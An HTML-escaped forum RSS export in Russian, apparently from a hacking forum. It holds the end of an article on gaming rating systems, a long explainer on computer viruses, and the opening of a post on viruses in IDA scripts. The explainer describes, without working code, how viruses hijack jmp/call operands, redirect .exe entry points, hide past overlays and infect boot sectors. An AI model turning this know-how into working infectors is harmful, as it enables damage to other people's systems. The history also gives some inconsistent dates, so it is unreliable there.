&amp;quot;самоуничтожения&amp;quot; &lt;br /&gt;рейтинговых систем. Остается только инициировать процесс... &lt;br /&gt;&lt;/p&gt;
						&lt;p&gt;Кто-то, прочитав последний абзац, скажет &amp;quot;вот и ***дец, пришли&amp;quot;, как &lt;br /&gt;тот одноглазый, который повел слепого в бордель через лес и выбил &lt;br /&gt;себе веткой последний глаз, а в ответ слышит радостное &lt;br /&gt;&amp;quot;здравствуйте, девочки...&amp;quot;... &lt;/p&gt;
						&lt;p&gt;5 мая-14 июля 2002 года &lt;br /&gt;Urix &lt;/p&gt;
						&lt;p&gt;P.S. У меня есть две новости. Я не вождь троглодитов, поэтому начну &lt;br /&gt;с хорошей. Прежде чем публиковать эту статью, я придумал, как надо &lt;br /&gt;юридически и технически правильно без Java-счетчиков подсчитывать &lt;br /&gt;рейтинги, поскольку, как и все честные люди, я заинтересован в &lt;br /&gt;существовании рейтинговых систем с высоким уровнем доверия. Плохая &lt;br /&gt;новость та, что хотя это и спасает от полной дискредитации &lt;br /&gt;рейтинговые системы, но не является абсолютной панацеей. &lt;br /&gt;18-20 октября 2002 года.&lt;/p&gt;</description>
			<author>mybb@mybb.ru (admin)</author>
			<pubDate>Wed, 05 Aug 2009 13:53:18 +0400</pubDate>
			<guid>http://hackzona.youbb.ru/viewtopic.php?pid=30#p30</guid>
		</item>
		<item>
			<title>Вирусы</title>
			<link>http://hackzona.youbb.ru/viewtopic.php?pid=29#p29</link>
			<description>&lt;p&gt;Вирусы. Они бывают разные - например, грипп, гепатит, герпес; а бывают еще и&lt;br /&gt;компьютерные. Вот о них, родимых, и поговорим. Что же это такое - компьютерный вирус?&lt;/p&gt;
						&lt;p&gt;Объяснений, что такое компьютерный вирус, можно привести несколько. Самое простое -&lt;br /&gt;бытовое объяснение для домохозяйки, которая ни разу в жизни компьютера не видела, но&lt;br /&gt;знает, что Он есть, и что в Нем водятся Вирусы. Объяснение будет дано на примере&lt;br /&gt;клерка, работающего исключительно с бумагами. Идея такого объяснения принадлежит&lt;br /&gt;Д.Н.Лозинскому.&lt;/p&gt;
						&lt;p&gt;Представим себе аккуратного клерка, который приходит на работу, к себе в контору и&lt;br /&gt;каждый день обнаруживает у себя на столе стопку листов бумаги со списком заданий,&lt;br /&gt;которые он должен выполнить за рабочий день. Клерк берет верхний лист, читает указания&lt;br /&gt;начальства, пунктуально их выполняет, выбрасывает &amp;quot;отработанный&amp;quot; лист в мусорное ведро&lt;br /&gt;и переходит к следующему листу. Предположим, что некий злоумышленник тайком&lt;br /&gt;прокрадывается в контору и подкладывает в стопку бумаг лист, на котором написано&lt;br /&gt;следующее: &amp;quot;Переписать этот лист два раза и положить копии в стопку заданий соседей&amp;quot;.&lt;/p&gt;
						&lt;p&gt;Что сделает клерк? Дважды перепишет лист, положит его соседям на стол, уничтожит&lt;br /&gt;оригинал и перейдет к выполнению второго листа из стопки, т.е. продолжит выполнять&lt;br /&gt;свою настоящую работу. Что сделают соседи, являясь такими же аккуратными клерками,&lt;br /&gt;обнаружив новое задание? То же, что и первый: перепишут его по два раза и раздадут&lt;br /&gt;другим клеркам. Итого, в конторе бродят уже четыре копии первоначального документа,&lt;br /&gt;которые и дальше будут копироваться и раздаваться на другие столы.&lt;/p&gt;
						&lt;p&gt;Примерно так же работает и компьютерный вирус, только стопками бумаг-указаний являются&lt;br /&gt;программы, а клерком - компьютер. Так же как и клерк, компьютер аккуратно выполняет&lt;br /&gt;все команды программы (листы заданий), начиная с первой. Если же первая команда звучит&lt;br /&gt;как &amp;quot;скопируй меня в две другие программы&amp;quot;, то компьютер так и сделает, - и&lt;br /&gt;команда-вирус попадает в две другие программы. Когда компьютер перейдет к выполнению&lt;br /&gt;других &amp;quot;зараженных&amp;quot; программ, вирус тем же способом будет расходиться все дальше и&lt;br /&gt;дальше по всему компьютеру.&lt;/p&gt;
						&lt;p&gt;В приведенном выше примере про клерка и его контору лист-вирус не проверяет, заражена&lt;br /&gt;очередная папка заданий или нет. В этом случае к концу рабочего дня контора будет&lt;br /&gt;завалена такими копиями, а клерки только и будут что переписывать один и тот же текст&lt;br /&gt;и раздавать его соседям - ведь первый клерк сделает две копии, очередные жертвы вируса&lt;br /&gt;- уже четыре, затем 8, 16, 32, 64 и т.д., т.е. количество копий каждый раз будет&lt;br /&gt;увеличиваться в два раза. Если клерк на переписывание одного листа тратит 30 секунд и&lt;br /&gt;еще 30 секунд на раздачу копий, то через час по конторе будет &amp;quot;бродить&amp;quot; более&lt;br /&gt;1.000.000.000.000.000.000 копий вируса! Скорее всего, конечно же, не хватит бумаги, и&lt;br /&gt;распространение вируса будет остановлено по столь банальной причине.&lt;/p&gt;
						&lt;p&gt;Как это ни смешно (хотя участникам этого инцидента было совсем не смешно), именно&lt;br /&gt;такой случай произошел в 1988 году в Америке - несколько глобальных сетей передачи&lt;br /&gt;информации оказались переполненными копиями сетевого вируса (вирус Морриса), который&lt;br /&gt;рассылал себя от компьютера к компьютеру. Поэтому &amp;quot;правильные&amp;quot; вирусы делают так:&lt;br /&gt;&amp;quot;Переписать этот лист два раза и положить копии в стопку заданий соседей, если у них&lt;br /&gt;еще нет этого листа&amp;quot;. Проблема решена - &amp;quot;перенаселения&amp;quot; нет, но каждая стопка содержит&lt;br /&gt;по копии вируса, при этом клерки еще успевают справляться и с обычной работой.&lt;/p&gt;
						&lt;p&gt;&amp;quot;А как же уничтожение данных?&amp;quot; - спросит хорошо эрудированная домохозяйка. Все очень&lt;br /&gt;просто - достаточно дописать на лист примерно следующее:&lt;br /&gt;1. Переписать этот лист два раза и положить копии в стопку заданий соседей, если у них&lt;br /&gt;еще нет этого листа.&lt;br /&gt;2. Посмотреть на календарь - если сегодня пятница, попавшая на 13-е число, выкинуть&lt;br /&gt;все документы в мусорную корзину.&lt;/p&gt;
						&lt;p&gt;Кстати, на примере клерка очень хорошо видно, почему в большинстве случаев нельзя&lt;br /&gt;точно определить, откуда в компьютере появился вирус. Все клерки имеют одинаковые (с&lt;br /&gt;точностью до почерка) КОПИИ, но оригинал-то с почерком злоумышленника уже давно в&lt;br /&gt;корзине!&lt;/p&gt;
						&lt;p&gt;Вот такое простое объяснение работы вируса. Плюс к нему хотелось бы привести две&lt;br /&gt;аксиомы, которые, как это ни странно, не для всех являются очевидными:&lt;br /&gt;Во-первых, вирусы не возникают сами собой - их создают программисты-хакеры и рассылают&lt;br /&gt;затем по сети или подкидывают на компьютеры знакомых. Вирус не может сам собой&lt;br /&gt;появиться на вашем компьютере - либо его подсунули на дискетах или даже на&lt;br /&gt;компакт-диске, либо вы его случайно скачали из компьютерной сети, либо вирус жил у вас&lt;br /&gt;в компьютере с самого начала.&lt;br /&gt;Во-вторых: компьютерные вирусы заражают только компьютер и ничего больше, поэтому не&lt;br /&gt;надо бояться - через клавиатуру и мышь они не передаются.&lt;/p&gt;
						&lt;p&gt;Теперь попробуем дать более точное определение вируса. Основная трудность, возникающая&lt;br /&gt;при попытках дать это определение, заключается в том, что практически все&lt;br /&gt;отличительные черты вируса (внедрение в другие объекты, скрытность, потенциальная&lt;br /&gt;опасность и проч.) либо присущи другим программам, которые никоим образом вирусами не&lt;br /&gt;являются, либо же существуют вирусы, которые не содержат указанных выше отличительных&lt;br /&gt;черт (за исключением возможности распространения).&lt;/p&gt;
						&lt;p&gt;Например, если в качестве отличительной характеристики вируса принимается скрытность,&lt;br /&gt;то легко привести пример вируса, не скрывающего своего распространения. Такой вирус&lt;br /&gt;перед заражением любого файла выводит сообщение, гласящее, что в компьютере находится&lt;br /&gt;вирус и этот вирус готов поразить очередной файл, затем выводит имя этого файла и&lt;br /&gt;запрашивает разрешение пользователя на внедрение вируса в файл.&lt;/p&gt;
						&lt;p&gt;Если в качестве отличительной черты вируса приводится возможность уничтожения им&lt;br /&gt;программ и данных на дисках, то в качестве контрпримера к данной отличительной черте&lt;br /&gt;можно привести десятки совершенно безобидных вирусов, которые кроме своего&lt;br /&gt;распространения ничем больше не отличаются.&lt;/p&gt;
						&lt;p&gt;Основная же особенность компьютерных вирусов - возможность их самопроизвольного&lt;br /&gt;внедрения в различные объекты операционной системы - присуща многим программам,&lt;br /&gt;которые не являются вирусами. Например, операционная система MS-DOS имеет в себе все&lt;br /&gt;необходимое, чтобы самопроизвольно устанавливаться на не-DOS&#039;овские диски. Для этого&lt;br /&gt;достаточно на загрузочный флоппи-диск, содержащий DOS, записать файл AUTOEXEC.BAT&lt;br /&gt;следующего содержания:&lt;br /&gt;SYS A:&lt;br /&gt;COPY *.* A:\&lt;br /&gt;SYS B:&lt;br /&gt;COPY *.* B:\&lt;br /&gt;SYS C:&lt;br /&gt;COPY *.* C:\&lt;/p&gt;
						&lt;p&gt;Модифицированная таким образом DOS сама станет самым настоящим вирусом с точки зрения&lt;br /&gt;практически любого существующего определения компьютерного вируса.&lt;/p&gt;
						&lt;p&gt;Таким образом, первой из причин, не позволяющих дать точное определение вирусу,&lt;br /&gt;является невозможность однозначно выделить отличительные признаки, которые&lt;br /&gt;соответствовали бы только вирусам.&lt;/p&gt;
						&lt;p&gt;Мнений по поводу даты рождения первого компьютерного вируса очень много. Доподлинно&lt;br /&gt;известно только одно: на машине Беббиджа его не было, а на Univac 1108 и IBM-360/370&lt;br /&gt;они уже были (&amp;quot;Pervading Animal&amp;quot; и &amp;quot;Christmas tree&amp;quot;). Таким образом, первый вирус&lt;br /&gt;появился где-то в самом начале 70-х или даже в конце 60-х годов, хотя &amp;quot;вирусом&amp;quot; его&lt;br /&gt;никто еще не называл.&lt;/p&gt;
						&lt;p&gt;Поговорим о новейшей истории: &amp;quot;Brain&amp;quot;, &amp;quot;Vienna&amp;quot;, &amp;quot;Cascade&amp;quot; и далее. Те, кто начал&lt;br /&gt;работать на IBM-PC аж в середине 80-х, еще не забыли повальную эпидемию этих вирусов в&lt;br /&gt;1987-89 годах. Буквы сыпались на экранах, а толпы пользователей неслись к специалистам&lt;br /&gt;по ремонту дисплеев (сейчас все наоборот: винчестер сдох от старости, а валят на&lt;br /&gt;неизвестный передовой науке вирус). Затем компьютер заиграл чужеземный гимн &amp;quot;Yankee&lt;br /&gt;Doodle&amp;quot;, но чинить динамики уже никто не бросился - очень быстро разобрались, что это&lt;br /&gt;- вирус, да не один, а целый десяток.&lt;/p&gt;
						&lt;p&gt;Так вирусы начали заражать файлы. Вирус &amp;quot;Brain&amp;quot; и скачущий по экрану шарик вируса&lt;br /&gt;&amp;quot;Ping-pong&amp;quot; ознаменовали победу вируса и над Boot-сектором.&lt;/p&gt;
						&lt;p&gt;Время шло, вирусы плодились. Все они были чем-то похожи друг на друга, лезли в память,&lt;br /&gt;цеплялись к файлам и секторам, периодически убивали файлы, дискеты и винчестеры. Одним&lt;br /&gt;из первых &amp;quot;откровений&amp;quot; стал вирус &amp;quot;Frodo.4096&amp;quot; - файловый вирус-невидимка (стелс).&lt;br /&gt;Этот вирус перехватывал INT 21h и, при обращении через DOS к зараженным файлам,&lt;br /&gt;изменял информацию таким образом, что файл появлялся перед пользователем в&lt;br /&gt;незараженном виде. Но это была только надстройка вируса над MS-DOS. Не прошло и года,&lt;br /&gt;как электронные тараканы полезли внутрь ядра DOS (вирус-невидимка &amp;quot;Beast.512&amp;quot;). Идея&lt;br /&gt;невидимости продолжала приносить свой плоды и далее: летом 1991 года пронесся, кося&lt;br /&gt;компьютеры как бубонная чума, вирус &amp;quot;Dir_II&amp;quot;.&lt;/p&gt;
						&lt;p&gt;Но бороться с невидимками было довольно просто: почистил RAM - и будь спокоен, ищи&lt;br /&gt;гада и лечи его на здоровье. Побольше хлопот доставляли самошифрующиеся вирусы,&lt;br /&gt;которые иногда встречались в очередных поступлениях в коллекции. Ведь для их&lt;br /&gt;идентификации и удаления приходилось писать специальные подпрограммы, отлаживать их.&lt;br /&gt;Но на это никто тогда не обращал внимания, пока... Пока не появились вирусы нового&lt;br /&gt;поколения, те, которые носят название полиморфик-вирусы. Эти вирусы используют другой&lt;br /&gt;подход к невидимости: они шифруются (в большинстве случаев), а в расшифровщике&lt;br /&gt;используют команды, которые могут не повторяться при заражении различных файлов.&lt;/p&gt;
						&lt;p&gt;Первый полиморфный вирус появился в начале 90-х кодов - &amp;quot;Chameleon&amp;quot;, но по-настоящему&lt;br /&gt;серьезной проблема полиморфик-вирусов стала лишь год спустя - в апреле 1991-го, когда&lt;br /&gt;практически весь мир был охвачен эпидемией полиморфик-вируса &amp;quot;Tequila&amp;quot;.&lt;/p&gt;
						&lt;p&gt;Год 1995-й, август. Все прогрессивное человечество, компания Microsoft и Билл Гейтс&lt;br /&gt;лично празднуют выход новой операционной системы Windows95. На фоне шумного торжества&lt;br /&gt;практически незамеченным прошло сообщение о появлении вируса, использующего&lt;br /&gt;принципиально новые методы заражения - вируса, заражающего документы Microsoft Word.&lt;/p&gt;
						&lt;p&gt;А вирус, получивший к тому времени имя &amp;quot;Concept&amp;quot;, продолжал победное движение по&lt;br /&gt;планете. Появившись, скорее всего, в каком-то из подразделений Microsoft, &amp;quot;Concept&amp;quot; в&lt;br /&gt;мгновение ока завладел тысячами (если не миллионами) компьютеров. Это неудивительно,&lt;br /&gt;ведь передача текстов в формате MS Word стала де-факто одним из стандартов, а для&lt;br /&gt;того, чтобы заразиться вирусом, требуется всего лишь открыть зараженный документ, и&lt;br /&gt;все остальные документы, редактируемые в зараженном Word&#039;e, также оказываются&lt;br /&gt;зараженными. В результате, получив по Интернету зараженный файл и прочитав его,&lt;br /&gt;пользователь, не зная того сам, оказывался &amp;quot;разносчиком заразы&amp;quot;, и вся его переписка&lt;br /&gt;(если, конечно же, она велась при помощи MS Word) также оказывалась зараженной! Таким&lt;br /&gt;образом, возможность заражения MS Word, помноженная на скорость Интернета, стала одной&lt;br /&gt;из самых серьезных проблем за всю историю существования вирусов.&lt;/p&gt;
						&lt;p&gt;Не прошло и года, как летом 1996-го года появился вирус &amp;quot;Laroux&amp;quot; (&amp;quot;Лару&amp;quot;), заражающий&lt;br /&gt;таблицы MS Excel. Как и в случае с вирусом &amp;quot;Concept&amp;quot;, новый макро-вирус был обнаружен&lt;br /&gt;&amp;quot;в природе&amp;quot; практически одновременно в разных фирмах. Кстати, в 1997 году этот вирус&lt;br /&gt;стал причиной эпидемии в Москве.&lt;/p&gt;
						&lt;p&gt;В том же 1996 году появились первые конструкторы макро-вирусов, а в начале 1997 года&lt;br /&gt;появились первые полиморфик-макро-вирусы для MS-Word и первые вирусы для MS Office97.&lt;br /&gt;Плюс к тому непрерывно росло число разнообразных макро-вирусов, достигшее нескольких&lt;br /&gt;сотен к лету 1997-го.&lt;/p&gt;
						&lt;p&gt;Так что же происходит, когда вирус попадает в машину?&lt;/p&gt;
						&lt;p&gt;Так как вирус - программа, которую написал человек, то, естественно, как и все&lt;br /&gt;программы, он имеет структуру, которая присуща и другим вирусам. Что главное для&lt;br /&gt;вируса? Основным параметром вируса является размножение, если, конечно, его не писали&lt;br /&gt;для определенных целей, типа добавить денег на счет &amp;quot;писателя&amp;quot; в каком-то банке.&lt;br /&gt;Поэтому главный блок любого вируса - это блок размножения. Как же строится этот&lt;br /&gt;&amp;quot;главный&amp;quot; блок вируса? Сколько разных идей было придумано программистами в этих целях?&lt;br /&gt;В первых модификациях только &amp;quot;заражали&amp;quot; файлы .cом, .exe, .sys, т.е. те, которые&lt;br /&gt;непосредственно содержали исполнимый код. Это понятно, но как искать эти файлы, ведь&lt;br /&gt;на диске так много каталогов? Первые модели брали пути, которые они прописывают в&lt;br /&gt;переменной PATH, и по ним искали &amp;quot;новые жертвы&amp;quot;. Более поздние обыскивали весь диск,&lt;br /&gt;открывая по очередности все каталоги системы (очень долгий процесс, поэтому на&lt;br /&gt;компьютерах того времени это занимало довольно большой отрезок времени и сразу было&lt;br /&gt;видно - вирус). Позже стали делать &amp;quot;резиденты-вирусы&amp;quot;. Они &amp;quot;вешались&amp;quot; в памяти и&lt;br /&gt;следили за тем, что делает ДОС. Как только ловили обращение системы к какому-то файлу&lt;br /&gt;- мгновенно заражали этот файл-бедняжку. Вот так-то. С этим, вроде, решили (как найти&lt;br /&gt;жертвы).&lt;/p&gt;
						&lt;p&gt;Теперь непосpедственно о заpажении. Спеpва поговоpим о .com виpусах, т.е. заpажающих&lt;br /&gt;.com файлы. Если вирус помещает свое тело в начале программы, его местоположение&lt;br /&gt;всегда жестко закреплено, при запуске этой зараженной программы он выполняется первым,&lt;br /&gt;при этом его легко &amp;quot;поймать&amp;quot;, притом после своей работы он должен возвращать ту часть&lt;br /&gt;программы, на месте которой он расположился. Если тело вируса лежит в середине, то его&lt;br /&gt;максимально трудно поймать и вылечить файл, так как необходимо вычислить, где именно&lt;br /&gt;он находится, зато у вируса возникают проблемы - необходимо переносить после работы на&lt;br /&gt;свое место блок, который был там до заражения. Еще один подводный камень для вируса,&lt;br /&gt;передача ему управления. Ему необходимо где-то в начале сделать пеpеход на точку&lt;br /&gt;выполнения, но вот только как делается такой пеpеход? Был придуман &amp;quot;фиктивный&amp;quot;&lt;br /&gt;переход. Первый из них - это дописать в начале программы переход типа jmp addr, где&lt;br /&gt;addr - точка запуска вируса, а после выполнения &amp;quot;черных дел&amp;quot; вирус вернет на место&lt;br /&gt;этого jmp-а старый код, но при просмотре программ эту подмену можно легко заметить.&lt;br /&gt;Поэтому сейчас применяют более изощренный метод. Дело в том, что команда jmp и call -&lt;br /&gt;очень распространенные команды, и их использует практически любая программа. Поэтому&lt;br /&gt;вирус ищет в начале программы код, соответствующий jmp addr или call addr и вместо&lt;br /&gt;адреса в операнде подставляет свой, а после своего выполнения делает переход на старый&lt;br /&gt;адрес. Увидеть подмену адреса - довольно сложный процесс. Если же тело вируса лежит в&lt;br /&gt;конце, то у вируса возникают проблемы с запуском и возможностью легкого обнаружения,&lt;br /&gt;но при этом нет необходимости переносить блоки, на месте которых находится вирус.&lt;/p&gt;
						&lt;p&gt;Теперь немного о заражении .exe файлов. У них есть заголовок, в котором прописаны&lt;br /&gt;очень важные данные, как-то: требуемый размер памяти, сегмент стека, и, что более&lt;br /&gt;важно, точка запуска программы. Следовательно, эту точку можно поменять так, чтобы она&lt;br /&gt;как раз попадала на вирус, который может располагаться опять-таки, в трех местах (об&lt;br /&gt;этом говорилось выше). Теперь, казалось бы, берется метод заражения файла с допиской&lt;br /&gt;тела вируса в конец, и меняется точка запуска на точку запуска вируса. Но при таком&lt;br /&gt;расположение вируса его легко обнаружить (антивирусы ругают те программы, у которых&lt;br /&gt;точка пуска лежит в конце, ибо это редкость). Еще один камушек для вируса -&lt;br /&gt;существование у .exe файлов оверлеев, т.е. кусков кода, которые при запуске не&lt;br /&gt;грузятся в память, а их по необходимости подгружают в последствии. Так, если вирус&lt;br /&gt;цепляется в конце файла, то у него нет гарантии, что он будет находиться в памяти&lt;br /&gt;после запуска. Для этого находится абсолютный конец, т.е. такой участок, где&lt;br /&gt;заканчивается сама программа и начинаются оверлеи. Потом сюда вписывается вирус, а&lt;br /&gt;оверлеи сдвигают на длину вируса. Другие методы с допиской вируса в начало или&lt;br /&gt;середину тоже используются при написании .exe вирусов. Но они для запуска тела в коде&lt;br /&gt;программы уже ищут не jmp addr и call adrr, а jmp far addr и call far addr, т.к. .exe&lt;br /&gt;файлы нередко превышают длину одного сегмента. Не стоит забывать и о заражении boot и&lt;br /&gt;master-boot секторов. Этот способ повел за собой целую цепочку бутовых вирусов. Дело в&lt;br /&gt;том, что в boot-записи, которая, для незнающих, находится на диске, в 1 секторе, 0&lt;br /&gt;головке, 0 цилиндре, записана программа, которая &amp;quot;загружает&amp;quot; ОС. Эта программа&lt;br /&gt;пускается в самом начале работы, т.е. как только определено наличие жесткого диска.&lt;br /&gt;Именно программа, записанная в этой записи, &amp;quot;выкрикивает&amp;quot; известное сообщение: Non&lt;br /&gt;system disk or disk error!!!&lt;/p&gt;
						&lt;p&gt;Так вот туда и помещают вирус, который получает управление еще до загрузки&lt;br /&gt;операционной системы. Конечно, он не может использовать дисковых операций на уровне&lt;br /&gt;DOS, но может, в крайнем случае, &amp;quot;повесится&amp;quot; резидентом в память. Следует заметить еще&lt;br /&gt;одну интересную вещь. При заражении &amp;quot;умные&amp;quot; вирусы стараются заразить, прежде всего,&lt;br /&gt;дискеты, т.к. эти дискеты могут перенести на другой компьютер и... тады ой.&lt;/p&gt;
						&lt;p&gt;После блока заpажения идет втоpой уже &amp;quot;необязательный&amp;quot; блок - тот, котоpого боятся все&lt;br /&gt;пользователи. Это блок действия. Именно этот блок является &amp;quot;пpиятной неожиданностью&amp;quot; в&lt;br /&gt;pаботе виpуса. Обычно он запускается не сpазу. Только &amp;quot;глупый&amp;quot; виpус выдает свое&lt;br /&gt;пpисутствие сpазу. Умный сначала pазмножится так, чтобы система была уже &amp;quot;обpечена&amp;quot;, и&lt;br /&gt;узнает о существовании виpуса пользователь или нет - уже не имеет значения. Чаще всего&lt;br /&gt;в теле виpуса имеется некий счетчик (Counter), в котоpом учитывается число &amp;quot;успешных&amp;quot;&lt;br /&gt;заpажений. После того, как счетчик достигнет опpеделенного значения, идет запуск блока&lt;br /&gt;действия. А в еще более изощpенных модификациях существуют 2 счетчика. Пеpвый тоже&lt;br /&gt;содеpжит число заpаженных файлов, а втоpой - число заpаженных файлов на дискетах. И&lt;br /&gt;только когда оба счетчика достигнут опpеделенного значения, запускается блок действия.&lt;br /&gt;Зачем это делается? Да ведь если виpус, скажем, заpазит на жестском диске 1000 файлов&lt;br /&gt;и отфоpматиpует его, то он сам себя и убьет. И не достигнет основной цели - выжить.&lt;br /&gt;Именно содеpжимое блока действия создало такое pазнообpазие виpусов, что очень тpудно&lt;br /&gt;пеpечислить все модификации, но основные виды можно попpобовать. Пеpвый тип -&lt;br /&gt;безобидные демонстpатоpы. Они не делают ничего плохого, только мешают пользователю в&lt;br /&gt;pаботе. Скажем, вдpуг на экpане появляется кpасный теннисный мячик и, отбиваясь от&lt;br /&gt;символов, скачет по экpану. Или ни с того ни с сего начинают опадать буквы вниз (а-ля&lt;br /&gt;листопад). Далее следует гpуппа так называемых пугающих виpусов. В пpинципе их можно&lt;br /&gt;отнести к пеpвой гpуппе, но действие этих виpусов очень интеpесно. Они обычно очень&lt;br /&gt;пpавдиво и популяpно pассказывают пользователю о том, что сейчас, к пpимеpу, его&lt;br /&gt;жесткий диск будет отфоpматиpован. И потихоньку pисуют быстpо меняющийся индикатоp&lt;br /&gt;пpоцентов очищенного пpостpанства. Hовичок-пользователь увидев это (скоpее всего),&lt;br /&gt;потеpяет сознание или, что еще хуже, получит pазpыв сеpдца. Чаще всего, конечно, это&lt;br /&gt;шутки, хотя не всегда. Следом идет не менее обшиpная гpуппа так называемых pазpушающих&lt;br /&gt;виpусов. Их задачей, естественно, является pазpушение. Самое пpимитивное, что они&lt;br /&gt;могут сделать, это отфоpматиpовать жестский диск, дискету или стереть BIOS. Hо пpи&lt;br /&gt;этом виpус убьет и себя. Интеpеснее было бы сделать так, чтобы виpус показал свое&lt;br /&gt;пpисутствие, но в то же вpемя пользователь не мог так пpосто от него избавиться.&lt;br /&gt;Извpащенные умы нашли и здесь очень тонкий метод. Пpедставте себе каpтину: виpус&lt;br /&gt;закодиpовал вам жестский диск. И только в том случае, если виpус запущен и находится в&lt;br /&gt;памяти, DOS в состоянии пpочесть ту закодиpованную инфоpмацию. Таким обpазом,&lt;br /&gt;пользователь пpосто обязан запускать виpус. Тем самым виpусописатель достиг высшей&lt;br /&gt;стадии, когда уже виpус не должен искать лазейки для своего запуска, а сам&lt;br /&gt;пользователь уже его запускает. Вот это метод! Или, скажем, считать FAT и скопиpовать&lt;br /&gt;его в абсолютно дpугое место на диске, а на его месте написать всякую белибеpду. Опять&lt;br /&gt;же без запуска виpуса у пользователя система не будет коppектно pаботать.&lt;/p&gt;
						&lt;p&gt;Каждый день появляются новые вирусы, и это неизбежное зло. Стопроцентной гарантии от&lt;br /&gt;заражения не даст никто. Хотя есть один способ. Забить во флоп чопик, сидюк&lt;br /&gt;использовать только как подставку под кофе, сетевую карточку выбросить, а модем отдать&lt;br /&gt;врагу, пусть мучается. Но это все уже для параноиков. Не так страшен черт, как его&lt;br /&gt;малюют, особенно если про него знаешь.&lt;/p&gt;
						&lt;p&gt;И напоследок небольшая памятка:&lt;br /&gt;* виpус не может пеpедаться по воздуху или чеpез дpугую сpеду, его можно только&lt;br /&gt;пpинести на дискете, скачать из Сети или загpузить с жесткого диска, запустив&lt;br /&gt;заpаженный файл;&lt;br /&gt;* если компьютеp стоит выключенный, то виpусы не могут ничего там испоpтить;&lt;br /&gt;* если вы пpосто вставили дискету и не запустили с нее ни одного файла, а также не&lt;br /&gt;стаpтовали с нее систему, то виpус с дискеты не попадет в компьютеp, т.е. вы&lt;br /&gt;можете смело пpосматpивать содеpжимое дискет, не боясь заpажений;&lt;br /&gt;* по сети нельзя пpосто так заpазиться виpусом. Можно только получить заpазный файл,&lt;br /&gt;котоpый заpазит ваш компьютеp только после своего запуска;&lt;br /&gt;* если наступила пятница 13, а вы вчеpа пpовеpяли компьтеp на наличие виpусов, то&lt;br /&gt;смело запускайте компьютеp, это не такой уж знаменательный день. Виpус может&lt;br /&gt;активизиpоватся и, напpимеp, 23 июля;&lt;br /&gt;* не веpьте сплетням о том, что виpусы pазpушили у кого-то &amp;quot;железо&amp;quot; на компе. Все&lt;br /&gt;это бpед, максимум, что возможно, так это отфоpматиpовать носитель, ну или стиреть&lt;br /&gt;BIOS;&lt;br /&gt;* и вообще, если вы будете пpовеpять антивиpусными сpедствами все пpиходящие файлы&lt;br /&gt;(на дисках и/или по сети), и pаз в неделю пpовеpять весь компьютеp, то смело&lt;br /&gt;можете не боятся виpусов;&lt;br /&gt;* если уж виpус на вашем компе, то не отчаивайтесь, а запустите антивиpус;&lt;br /&gt;* если антивиpус обнаpужил и излечил файлы на вашем компе от виpусов, а они вскоpе&lt;br /&gt;опять появились, то подумайте, что вы успели поназапускать за пpошедшее от момента&lt;br /&gt;тестиpования вpемя. Если вы pаспаковывали аpхив и запускали файлы из него, значит&lt;br /&gt;навеpняка там виpус и сидит. Hе в файле-аpхиве, а в зааpхивиpованном в нем файле.&lt;br /&gt;Hеобходимо pаспаковать аpхив, пpовеpить и снова запаковать;&lt;br /&gt;* постоянно обновляйте антивирусные базы;&lt;br /&gt;* если вы получили вирус по почте, не стоит писать в ответ гневное письмо - скорее&lt;br /&gt;всего, отправитель сам стал жертвой, а вирус отослал себя сам, с его машины, найдя&lt;br /&gt;ваш почтовый адрес в базе компьютера.&lt;/p&gt;</description>
			<author>mybb@mybb.ru (admin)</author>
			<pubDate>Wed, 05 Aug 2009 13:50:21 +0400</pubDate>
			<guid>http://hackzona.youbb.ru/viewtopic.php?pid=29#p29</guid>
		</item>
		<item>
			<title>Вирусы в скриптах IDA</title>
			<link>http://hackzona.youbb.ru/viewtopic.php?pid=28#p28</link>
			<description>&lt;p&gt;По мотивам &amp;quot;Рогов и Копыт&amp;quot;, но с примерами вирусов для IDA PRO&lt;/p&gt;
						&lt;p&gt;Первый пик массовой вирусной эпидемии пришелся на некогда популярный компьютер &amp;quot;Эппл&amp;quot;.&lt;br /&gt;Наиболее излюбленным объектом атаки в то время оказался загрузочный сектор гибких&lt;br /&gt;магнитных дисков.&lt;/p&gt;
						&lt;p&gt;Очень скоро появилось множество простых утилит, которые проверяли целостность&lt;br /&gt;содержимого загрузочного сектора при его запуске, а так же резидентов, которые просто&lt;br /&gt;блокировали запись в оный до подтверждения пользователя.&lt;/p&gt;
						&lt;p&gt;Впрочем, с массовым внедрением емких жестких дисков эта проблема и вовсе перестала&lt;br /&gt;существовать. Но зато появилась другая. Один винчестер (уже не защищенный от записи)&lt;br /&gt;хранил все исполняемые файлы пользователя и зловредной программе ничего не стоило&lt;br /&gt;модифицировать (то есть инфицировать) их по своему желанию.&lt;/p&gt;
						&lt;p&gt;Наиболее очевидным выходом из сложившейся ситуации стало использование операционных&lt;br /&gt;систем с разграничением доступа, периодическая проверка CRC исполняемых файлов, а так&lt;br /&gt;же создание резидентных программ блокирующим запись.&lt;/p&gt;
						&lt;p&gt;Но исполняемые файлы в отличие от загрузочного сектора, могут активно модифицироваться&lt;br /&gt;не только вирусом. Практически ни один ревизор не может работать на компьютере&lt;br /&gt;программистов. То есть людей постоянно изменяющих множество исполняемых файлов&lt;br /&gt;Впрочем, программисты по судьбе своей мученики и их мольбам долго никто не внимал.&lt;/p&gt;
						&lt;p&gt;Сегодня наибольшее распространение получили макро-вирусы. Это укоренившиеся, хотя&lt;br /&gt;неправильное название. На самом деле стоило бы их назвать скрипт-вирусами, поскольку&lt;br /&gt;они написаны и функционируют на встроенном языке некоторого программного продукта&lt;br /&gt;(скрипте).&lt;/p&gt;
						&lt;p&gt;CorelDraw, PhotoShop, Quake II, Unreal вот далеко не полный перечень пакетов,&lt;br /&gt;поддерживающих развитые интерпретируемые (реже компилируемые) языки. Все они&lt;br /&gt;обеспечивают возможность функционирования и размножения вирусных и вредоносных&lt;br /&gt;программ (закладок и троянцев)&lt;/p&gt;
						&lt;p&gt;Вот тут-то антивирусная индустрия получила хороший щелчок. Она оказалась совсем не&lt;br /&gt;готова к такому развитию событий. Все средства предупреждения заболевания оказались&lt;br /&gt;бессильны. Ведь документ, создаваемый приложением, от записи и модификации не&lt;br /&gt;запретишь. То есть запретить-то, конечно, можно, и технически реализовать элементарно,&lt;br /&gt;но только любой пользователь отключит такую защиту - документ на то и документ, что бы&lt;br /&gt;с ним работать, а не смотреть &amp;quot;только на чтение&amp;quot;.&lt;/p&gt;
						&lt;p&gt;По той же причине все эти вирусы отлично функционируют и на NT и даже на UNIX и&lt;br /&gt;Макинтош, поскольку операционной системой для них оказывается само приложение,&lt;br /&gt;обрабатывающие скрипты.&lt;/p&gt;
